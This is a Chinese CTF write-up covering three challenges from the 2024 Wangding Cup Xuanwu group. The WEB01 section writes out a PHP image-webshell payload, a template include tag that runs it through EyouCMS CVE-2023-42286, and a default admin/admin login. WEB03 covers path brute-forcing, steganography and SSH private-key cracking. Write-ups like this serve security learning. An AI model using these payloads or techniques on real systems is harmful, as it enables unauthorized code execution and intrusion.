本次参加了网鼎杯玄武组的比赛,大佬云集,我们队伍就解出了三道题目,重在参与!
WEB01
使用默认密码登录后台 admin/admin
通过网上搜索到公开的漏洞 https://github.com/Nacl122/CVEReport/blob/main/CVE-2023-42286/EyouCMS%20Backend%20RCE.md
进行测试
构造一个图片马
-
1
-
2
GIF89a
<?php eval(system("cat ../../../flag.txt"));?>
上传
-
1
{eyou:include file="uploads/allimg/20241104/1-241104123542928.gif" /}
找到模板功能,将文件包含到index.html中
接着访问首页就可以获取到flag
WEB03
利用 dirb 工具爆破 web 路径,发现存在 robots.txt,利用 username
和 password 登录系统发现需要私钥登录。
下载 wbStego4.bmp 文件,利用 ctf 工具读取图片信息,结合图片名称,发现图片存在隐写,利用 wbs43open 工具读取隐写信息
隐写信息疑似ssh公钥,将该值复制到单独的id_rsa文件中,并修改为标准的公钥格式,并利用rsacracker工具爆破私钥
新建私钥文件id_rsa并利用私钥登录获取flag
REVERSE02
下载题目是一个jar文件,加载到idea分析,发现是aes加密
解密
附上部分题目
-
1
-
2
-
3
2024网鼎杯玄武部分题目.zip
链接:https://pan.baidu.com/s/1VG7WKmyKUdT-xM-OE0JP4Q?pwd=y426
提取码:y426
原文始发于微信公众号(安全逐梦人):2024网鼎杯玄武组WP
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论